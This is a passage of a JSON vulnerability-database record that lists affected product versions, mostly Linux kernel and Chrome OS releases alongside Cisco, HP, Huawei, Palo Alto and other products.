        "vendor": "linux",
        "version": "4.2.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.49"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.11"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.13"
      },
      {
        "model": "email gateway 7.6.2h968406",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.66"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.8"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.49"
      },
      {
        "model": "common services platform collector",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vds-tv streamer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.31"
      },
      {
        "model": "5510hi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "6125xlg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.7"
      },
      {
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.124"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.169"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.34"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.47"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.14"
      },
      {
        "model": "linux cloudlinuxos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cloud",
        "version": "6.0"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.405"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.54"
      },
      {
        "model": "cloudengine v100r005c10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "6800"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.2"
      },
      {
        "model": "ar3200 v200r008c20spc700",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "linux enterprise server 11-extra",
        "scope": null,
        "trust": 0.3,
        "vendor": "suse",
        "version": null
      },
      {
        "model": "security guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.11"
      },
      {
        "model": "kernel 3.19-rc",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux enterprise module for public cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.21"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.87"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.6"
      },
      {
        "model": "security guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.90"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.99"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.168"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.2"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.53"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.33"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.9"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "75007)0"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.3"
      },
      {
        "model": "propel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.20"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.41"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5.0.997"
      },
      {
        "model": "prime network change and configuration management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.71"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.16"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.128.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.67"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.26"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.65"
      },
      {
        "model": "ucs director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.70"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.12"
      },
      {
        "model": "junos space 15.2r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "105007)0"
      },
      {
        "model": "kernel 4.4-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14-4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.26"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.23"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.110"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.5"
      },
      {
        "model": "kernel 3.9-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.108"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.95"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.8"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.2"
      },
      {
        "model": "powerkvm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.19"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "129007)0"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.1"
      },
      {
        "model": "kernel 3.13-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.29"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.62"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.116"
      },
      {
        "model": "msr1000 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.17"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1192.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.67"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.62"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.115"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.2"
      },
      {
        "model": "videoscape distribution suite service manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2.8"
      },
      {
        "model": "helion cloudsystem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.1.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.14"
      },
      {
        "model": "dx series ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.56"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.76"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.39"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.1"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel 3.9-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.2"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "79007)0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.78"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.155"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.38"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.2"
      },
      {
        "model": "vrealize operations 6.2.0a",
        "scope": null,
        "trust": 0.3,
        "vendor": "vmware",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.24"
      },
      {
        "model": "cloudengine v100r006c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "6800"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.57"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.7.9"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.88"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.27"
      },
      {
        "model": "linux enterprise desktop sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.82"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.15"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.70"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.404"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.51"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.9"
      },
      {
        "model": "cloudengine v100r005c10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "12800"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.344"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.55"
      },
      {
        "model": "spa122 analog telephone adapter with router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel 3.8-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "virtuozzo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "virtuozzo",
        "version": "6.0"
      },
      {
        "model": "connected grid routers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "security guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.2"
      },
      {
        "model": "cloudengine v100r003c10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "7800"
      },
      {
        "model": "linux enterprise point of sale 11-sp3",
        "scope": null,
        "trust": 0.3,
        "vendor": "suse",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.8"
      },
      {
        "model": "linux enterprise server 12-ltss",
        "scope": null,
        "trust": 0.3,
        "vendor": "suse",
        "version": null
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.21"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.401"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.81"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.14"
      },
      {
        "model": "linux enterprise software development kit sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.119"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.54"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.123"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.50"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.2"
      },
      {
        "model": "android one",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.4"
      },
      {
        "model": "email gateway 7.6.405h1165239",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.59"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.3"
      },
      {
        "model": "cloudengine v200r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "7800"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.11"
      },
      {
        "model": "kernel 3.19-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "series digital media players",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "44000"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.113"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.60"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.35"
      },
      {
        "model": "ata series analog terminal adaptors",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1900"
      },
      {
        "model": "linux enterprise server sp3 ltss",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.40"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux enterprise server for sap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.14"
      },
      {
        "model": "cloudengine v200r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "8800"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.48"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.18"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59007)0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.41"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.72"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.12"
      },
      {
        "model": "unified communications manager session management edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "enterprise linux mrg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.32"
